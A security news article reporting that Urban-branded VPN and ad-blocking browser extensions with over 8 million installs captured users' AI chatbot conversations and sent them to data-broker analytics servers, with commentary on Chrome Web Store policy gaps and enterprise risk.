⬇️
Browser ‘privacy’ extensions caught logging AI chats from millions of users
Key Takeaways
- Koi Security found four popular Urban-branded extensions intercepting and exfiltrating chatbot conversations.
- More than 8 million installs across Chrome and Edge, with data collection enabled by default and no user-facing opt-out.
- Researchers say the extensions harvested conversations from major AI platforms, despite Chrome Web Store policies prohibiting such data sharing.
The discovery that four widely installed browser extensions were quietly siphoning off AI chat conversations has forced an uncomfortable question into the open: who’s actually watching the watchers? Koi Security’s analysis of extensions distributed under the Urban and 1ClickVPN brands shows the line between “privacy tool” and “surveillance helper” can be frighteningly thin, especially when an extension claims to protect you from the very risks it creates.
The four extensions—Urban VPN Proxy, 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker—were all available through both the Chrome Web Store and Microsoft Edge Add-ons. On the surface, they looked like the usual assortment of free VPNs and blockers that compete for ranking in those stores. Under the hood, however, Koi Security found hardcoded instructions to intercept and capture browser interactions with major AI platforms.
Idan Dardikman, Koi’s co-founder and CTO, outlined the findings in a recent report. He noted that Urban VPN Proxy alone targeted conversations across ten AI tools. That roster included ChatGPT, Claude, Gemini, Microsoft Copilot, Perplexity, DeepSeek, Grok, and Meta AI. It’s a list that reads like the modern knowledge worker’s daily rotation, which explains why this incident has hit a nerve among security teams.
The mechanism was equal parts simple and aggressive. The extensions monitored browser tabs; when a user opened a supported AI service, the extension injected what Koi calls an “executor” script. That script overrode two core browser APIs: fetch() and XMLHttpRequest. Anyone who has ever debugged a web app knows those APIs are the lifeblood of client–server communication. Override them, and you see everything. One might expect a VPN to manipulate network flows, but not by rewriting browser functions on a per‑page basis.
Once the script intercepted the request and response data, it parsed the results, wrapped them with a PANELOS_MESSAGE identifier, and passed them via window.postMessage to the extension’s content script. From there, the content script forwarded the data to a background service worker that sent it to analytics.urban-vpn.com and stats.urban-vpn.com. The flow is almost banal in its efficiency. A small detail, but worth noting: none of this was gated behind an on/off toggle. The harvesting was always on.
Dardikman said the only way to stop the collection was to uninstall the extensions entirely. That’s where it gets tricky for enterprises. Many users don’t remember installing free VPNs or ad blockers—it’s the kind of convenience-driven click-through behavior that haunts security trainings. And as Koi points out, users who installed Urban VPN before mid-2024 never even saw the new consent prompt added in version 5.5.0, because it arrived silently.
Urban VPN did disclose AI data collection in that prompt and in its privacy policy. But the Chrome Web Store listing wasn’t explicit about AI conversations, and it asserted that data wasn’t being sold to third parties outside approved cases. According to Dardikman, the privacy policy itself says the opposite: that the data is sold for marketing. That contradiction alone could keep a regulatory lawyer busy for hours.
Koi’s findings build on previous investigative work by security researcher Wladimir Palant and Secure Annex’s John Tuckner. Their earlier reporting documented BiScience—Urban VPN’s affiliated company—collecting user clickstream and browsing history data. Koi argues this latest discovery suggests BiScience expanded from browsing history into AI conversation content. It’s an uncomfortable escalation, particularly given the sensitivity of many AI chats. Anyone who has watched employees use AI systems to draft HR notes or troubleshoot customer issues knows how easily confidential material slips into prompts.
The Register reached out to Urban VPN, BiScience, and 1ClickVPN, but all email addresses bounced. Google also hasn’t commented. Silence doesn’t help here, especially since Urban VPN Proxy carried a Featured Badge in the Chrome Web Store. A human reviewer granted that badge. Did they examine the code that captured conversations with Google’s own Gemini platform? Or did they decide it wasn’t a violation? It’s a fair question, though not one Google seems eager to answer.
Chrome Web Store policies explicitly prohibit transferring or selling user data to third‑party data brokers. Yet the enforcement appears tangled in a loophole tied to Google’s Limited Use policy. That policy allows data transfers to third parties under very narrow circumstances, such as security purposes or a business ownership change. Those exceptions don’t cover brokers like BiScience.
Palant, in his own post, argues that BiScience and partners rely on user-facing features—like ad blocking or safe browsing—to claim that the data collection is “necessary to providing or improving your single purpose,” an exception that loosens restrictions. Or they claim security exceptions outright. The problem, he says, is that Chrome Web Store appears to accept these claims when they appear in privacy policies or disclosures, even if the technical behavior tells a different story. Anyone who has reviewed hundreds of extension manifests knows how easy it is to bury intent under the guise of “improving user protection.”
Still, the real operational takeaway is blunt. If any of these extensions are installed on corporate devices—or employee-owned devices accessing corporate systems—assume AI conversations since mid-2024 may have been captured and shared with third parties. And while this incident revolves around a set of Urban-branded extensions, it reveals a deeper challenge: enterprise security teams have limited visibility into how browser extensions behave once installed. It’s almost an attack surface hiding in plain sight.
